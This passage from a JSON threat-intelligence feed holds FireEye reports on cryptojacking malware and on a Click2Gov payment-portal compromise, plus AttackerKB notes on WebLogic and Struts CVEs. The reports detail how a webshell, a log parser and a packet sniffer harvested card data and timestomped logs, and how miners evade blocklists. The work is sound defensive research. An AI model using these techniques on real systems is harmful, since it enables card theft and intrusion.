\n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T14:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape:\nThe Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T14:00:00", "id": "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-11T20:17:40", "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:\n\n * &lt;op:AccountNum&gt;\n * &lt;op:CSC&gt;\n * &lt;op:ExpDate&gt;\n * &lt;op:FirstName&gt;\n * &lt;op:LastName&gt;\n * &lt;op:MInitial&gt;\n * &lt;op:Street1&gt;\n * &lt;op:Street2&gt;\n * &lt;op:City&gt;\n * &lt;op:State&gt;\n * &lt;op:PostalCode&gt;\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure any web service accounts run at least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations &amp; Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-19T10:00:00", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "modified": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": "https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2023-06-07T15:11:19", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-05T17:22:07", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2020-07-30T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T17:20:36", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nCVE-2019-2725 (aka CNVD-C 2019-48814) exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.\n\nAccording to the vendor, Oracle WebLogic Server v10.3.6.0 and 12.1.3.0 are affected.\n\nIn addition to a public proof-of-concept, a Metasploit module has been published to allow for exploitation of Windows, Linux, and Unix hosts. It has been successfully tested on v10.3.6.0, and exploitation failed against 12.2.1.2.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2019-2725", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-07-22T00:00:00", "id": "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "href": "https://attackerkb.com/topics/GmCoX0fF2M/cve-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:16:13", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 